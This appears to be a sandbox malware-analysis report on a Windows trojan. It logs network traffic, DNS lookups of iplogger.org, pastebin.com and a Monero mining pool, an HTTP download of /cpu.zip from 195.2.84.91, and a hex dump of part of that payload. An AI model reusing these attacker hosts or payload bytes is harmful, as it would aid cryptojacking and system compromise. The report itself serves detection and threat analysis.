                                                                                                Feb 23, 2021 17:37:24.416224003 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.416237116 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.416254997 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.416266918 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.416438103 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.416446924 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.492870092 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.564558983 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.737364054 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.814522982 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.884021044 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:24.891875982 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.924797058 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.925019979 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:24.925657034 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:24.966403008 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.969486952 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.969533920 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.969681025 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:24.983887911 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:25.024857998 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.024913073 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.044426918 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:25.085372925 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.095639944 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.095688105 CET44349720104.23.99.190192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.095808983 CET49720443192.168.2.5104.23.99.190
                                                                                                Feb 23, 2021 17:37:25.171179056 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.224242926 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.224370956 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.225007057 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.277941942 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.282644033 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.282681942 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.282795906 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.291398048 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.344472885 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.344686985 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.361016989 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.414315939 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935473919 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935516119 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935537100 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935554028 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935576916 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935605049 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935630083 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935652971 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.935683012 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.935708046 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.935736895 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.936688900 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.936712027 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.936794996 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.937869072 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.937890053 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.937973976 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.939120054 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.939138889 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.939215899 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.940375090 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.940392971 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.940464973 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.941596985 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.941621065 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.941726923 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.942872047 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.942898989 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.942974091 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.944051027 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.944068909 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.944123030 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.945302010 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.945318937 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.945394039 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.947081089 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.947099924 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.947165966 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.949013948 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.949047089 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.949120045 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.949366093 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.949410915 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.949460983 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.950355053 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.950390100 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.950463057 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:25.951529026 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.989051104 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.989095926 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.989233971 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:26.052030087 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:26.052059889 CET44349721172.67.213.210192.168.2.5
                                                                                                Feb 23, 2021 17:37:26.052165985 CET49721443192.168.2.5172.67.213.210
                                                                                                Feb 23, 2021 17:37:26.052253008 CET44349721172.67.213.210192.168.2.5

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 23, 2021 17:37:12.547579050 CET53617338.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:12.580703020 CET6544753192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:12.664455891 CET53654478.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:13.670665026 CET5244153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:13.732889891 CET53524418.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:14.566534996 CET6217653192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:14.615323067 CET53621768.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:16.025753975 CET5959653192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:16.077415943 CET53595968.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:17.097415924 CET6529653192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:17.157717943 CET53652968.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:18.250379086 CET6318353192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:18.299017906 CET53631838.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:19.041177988 CET6015153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:19.092890024 CET53601518.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:19.303397894 CET5696953192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:19.364610910 CET53569698.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:20.739161015 CET5516153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:20.790808916 CET53551618.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.058357954 CET5475753192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:24.118510962 CET53547578.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.825272083 CET4999253192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:24.882510900 CET53499928.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.109236956 CET6007553192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:25.169492960 CET53600758.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:25.245713949 CET5501653192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:25.294686079 CET53550168.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:29.574872971 CET6434553192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:29.623439074 CET53643458.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:36.597091913 CET5712853192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:36.658304930 CET53571288.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:37:47.174081087 CET5479153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:37:47.225727081 CET53547918.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:38:00.674447060 CET5046353192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:38:00.725982904 CET53504638.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:38:03.880925894 CET5039453192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:38:03.940182924 CET53503948.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:38:09.055700064 CET5853053192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:38:09.105990887 CET53585308.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:38:12.007255077 CET5381353192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:38:12.064420938 CET53538138.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:21.716789961 CET6373253192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:21.775274038 CET53637328.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:41.204437971 CET5734453192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:41.258730888 CET53573448.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:41.845001936 CET5445053192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:41.897260904 CET53544508.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:45.438951969 CET5926153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:45.496206045 CET53592618.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:46.473696947 CET5715153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:46.522680044 CET53571518.8.8.8192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Feb 23, 2021 17:37:24.058357954 CET192.168.2.58.8.8.80xfda1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:24.825272083 CET192.168.2.58.8.8.80xe4dbStandard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:25.109236956 CET192.168.2.58.8.8.80x9e26Standard query (0)blog.agencia10x.comA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:00.674447060 CET192.168.2.58.8.8.80x38b9Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.880925894 CET192.168.2.58.8.8.80x4bc7Standard query (0)pool.minexmr.comA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:41.204437971 CET192.168.2.58.8.8.80x7a45Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:41.845001936 CET192.168.2.58.8.8.80xb386Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:45.438951969 CET192.168.2.58.8.8.80x1265Standard query (0)whois.iana.orgA (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:46.473696947 CET192.168.2.58.8.8.80xa2ecStandard query (0)WHOIS.RIPE.NETA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Feb 23, 2021 17:37:24.118510962 CET8.8.8.8192.168.2.50xfda1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:24.882510900 CET8.8.8.8192.168.2.50xe4dbNo error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:24.882510900 CET8.8.8.8192.168.2.50xe4dbNo error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:25.169492960 CET8.8.8.8192.168.2.50x9e26No error (0)blog.agencia10x.com172.67.213.210A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:37:25.169492960 CET8.8.8.8192.168.2.50x9e26No error (0)blog.agencia10x.com104.21.67.51A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:00.725982904 CET8.8.8.8192.168.2.50x38b9No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com88.99.193.240A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com51.254.84.37A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com94.130.165.85A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com51.68.21.186A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com178.32.120.127A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com94.130.165.87A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com94.130.164.163A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:38:03.940182924 CET8.8.8.8192.168.2.50x4bc7No error (0)pool.minexmr.com51.68.21.188A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:41.258730888 CET8.8.8.8192.168.2.50x7a45No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:41.897260904 CET8.8.8.8192.168.2.50xb386No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:45.496206045 CET8.8.8.8192.168.2.50x1265No error (0)whois.iana.orgianawhois.vip.icann.orgCNAME (Canonical name)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:45.496206045 CET8.8.8.8192.168.2.50x1265No error (0)ianawhois.vip.icann.org192.0.47.59A (IP address)IN (0x0001)
                                                                                                Feb 23, 2021 17:39:46.522680044 CET8.8.8.8192.168.2.50xa2ecNo error (0)WHOIS.RIPE.NET193.0.6.135A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • 195.2.84.91

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.549729195.2.84.9180C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Feb 23, 2021 17:37:53.245167971 CET9238OUTGET /cpu.zip HTTP/1.1
                                                                                                Host: 195.2.84.91
                                                                                                Connection: Keep-Alive
                                                                                                Feb 23, 2021 17:37:53.333851099 CET9240INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Tue, 23 Feb 2021 16:37:53 GMT
                                                                                                Content-Type: application/zip
                                                                                                Content-Length: 6296834
                                                                                                Connection: keep-alive
                                                                                                Keep-Alive: timeout=60
                                                                                                Last-Modified: Sat, 20 Feb 2021 21:11:22 GMT
                                                                                                ETag: "601502-5bbcb02b93280"
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d bd e1 ee ec b6 70 0f 0f 4f 5f 76 1b 7b 76 6f 3f 0f 76 67 0f 76 25 1d 03 76 77 4f 3b 7b 61 32 32 62 ee 3f ea f0 0a 7e fc 59 8c 95 31 ea 4f 5f 4f 3f 96 48 e1 5b c9 1c f9 f0 56 b2 46 5e 62 64 55 f7 52 d4 3d 8c 7c e1 c6 12 79 f7 56 32 47 ca dd 4a d6 c8 22 8c 2c f2 64 89 e4 bd c5 33 45 72 dc ea 62 8a 72 65 61 8c 8a c7 e0 05 31 f7 25 98 76 00 db 0d 8e 2a b2 f7 16 cf 1c 79 ef 56 6e 44 89 df e2 93 30 f2 e6 fe 4e e4 8d d4 77 b6 75 ba b1 e7 ef e7 ac ab 0c 00 d8 3d 27 03 9c 4e 52 58
                                                                                                Data Ascii: PKz:Rgwconfig.jsonVn0+Cv-@rKQ iQEaCK{IyDEC=>?W*32<Vx,NP<v,4K{jr>h~Z{&Vhi1:JU[5urU1&WHnhlfhNS2?B.YqrL^e\bxNJ^:$dVxELT>'O"V~w4%x;:5#ND& \s\X<<bE(l)q4B+YlK#08h~muq#MP"gQ]?[[T[k_"jSBcL-v4Ub4x1c?e]./I<r$u`3ZOGU5|x"]:o<><=?=K-@/N?XJ&Vk_j;Mly_j%`.Dp$Wnwt"qWMC5eqaun>zVs!{m$Dy|N+EA0]DRArEu2)5TSJyw*PKT"URuG$_ icpu.exeZg8^.%-[;W DYe%6\yso9e5CsuF94G9}=pO_v{vo?vgv%vwO;{a22b?~Y1O_O?H[VF^bdUR=|yV2GJ",d3Erbrea1%v*yVnD0Nwu='NRX


                                                                                                HTTPS Packets

                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                Feb 23, 2021 17:37:24.416266918 CET88.99.66.31443192.168.2.549719CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                Feb 23, 2021 17:37:24.969533920 CET104.23.99.190443192.168.2.549720CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                Feb 23, 2021 17:37:25.282681942 CET172.67.213.210443192.168.2.549721CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:17:37:19
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
                                                                                                Imagebase:0x2e0000
                                                                                                File size:2817248 bytes
                                                                                                MD5 hash:BC584A3BE92CFDFDA79446372FFFA46D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:35
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\pg2bsuqa.exe
                                                                                                Wow64 process (32bit):true
